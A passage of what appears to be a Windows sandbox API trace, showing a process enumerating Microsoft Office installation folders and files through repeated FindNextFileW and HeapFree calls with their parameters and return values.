ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1865b8d4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verisign", cAlternateFileName="")) returned 0 [0165.838] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0165.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.838] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18681a5c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Sounds", cAlternateFileName="")) returned 1 [0165.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.840] FindNextFileW (in: hFindFile=0x727748, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1907d846, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1907d846, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Places", cAlternateFileName="")) returned 1 [0165.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.842] FindNextFileW (in: hFindFile=0x727748, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Things", cAlternateFileName="")) returned 1 [0165.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.843] FindNextFileW (in: hFindFile=0x727748, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Things", cAlternateFileName="")) returned 0 [0165.844] FindClose (in: hFindFile=0x727748 | out: hFindFile=0x727748) returned 1 [0165.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.844] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1907d846, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b6c9560, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolBMPs", cAlternateFileName="")) returned 1 [0165.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.846] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolData", cAlternateFileName="")) returned 1 [0165.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.848] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Computers", cAlternateFileName="COMPUT~1")) returned 1 [0165.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.848] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Computers", cAlternateFileName="COMPUT~1")) returned 0 [0165.848] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0165.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.849] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1983d259, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="groove.net", cAlternateFileName="")) returned 0 [0165.849] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0165.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.849] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 1 [0165.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.851] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 0 [0165.851] FindClose (in: hFindFile=0x727708 | out: hFindFile=0x727708) returned 1 [0165.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.851] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdd36584, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdf403dbb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdf58154c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf370c0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="GROOVE.EXE", cAlternateFileName="")) returned 1 [0165.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.853] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="EUROTOOL.XLAM", cAlternateFileName="EUROTO~1.XLA")) returned 1 [0165.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.853] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SOLVER", cAlternateFileName="")) returned 0 [0165.853] FindClose (in: hFindFile=0x727b08 | out: hFindFile=0x727b08) returned 1 [0165.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.853] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b27715c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b27715c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="LogoImages", cAlternateFileName="LOGOIM~1")) returned 1 [0166.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.076] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7c11d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdd0d91a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xde4d0d64, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1979a48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="lync.exe", cAlternateFileName="")) returned 1 [0166.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0166.245] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x38b7c4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="MeetingJoinAxOC.dll", cAlternateFileName="MEETIN~1.DLL")) returned 1 [0166.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.254] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6dea551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bg", cAlternateFileName="")) returned 1 [0166.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.255] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca", cAlternateFileName="")) returned 1 [0166.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.671] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf803d796, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf803d796, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf803d796, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs", cAlternateFileName="")) returned 1 [0166.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.676] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da", cAlternateFileName="")) returned 1 [0166.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.677] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de", cAlternateFileName="")) returned 1 [0166.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.679] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="el", cAlternateFileName="")) returned 1 [0166.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.680] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a3de35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a3de35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-us", cAlternateFileName="")) returned 1 [0166.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.680] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcb7dd00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es", cAlternateFileName="")) returned 1 [0166.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.682] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="et", cAlternateFileName="")) returned 1 [0166.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.682] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu", cAlternateFileName="")) returned 1 [0166.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.683] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fi", cAlternateFileName="")) returned 1 [0166.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.685] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr", cAlternateFileName="")) returned 1 [0166.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.685] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa178468, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gl", cAlternateFileName="")) returned 1 [0166.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.686] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf618b1a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf618b1a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he", cAlternateFileName="")) returned 1 [0166.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.688] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hi", cAlternateFileName="")) returned 1 [0166.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.688] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr", cAlternateFileName="")) returned 1 [0166.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.690] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu", cAlternateFileName="")) returned 1 [0166.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.690] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63a229e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x63a229e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x63a229e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="id", cAlternateFileName="")) returned 1 [0166.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.694] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ae17b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ae17b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ae17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10fcc8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ipcsecproc.dll", cAlternateFileName="IPCSEC~1.DLL")) returned 1 [0166.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.694] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja", cAlternateFileName="")) returned 1 [0166.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.696] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6781ff8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6781ff8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, 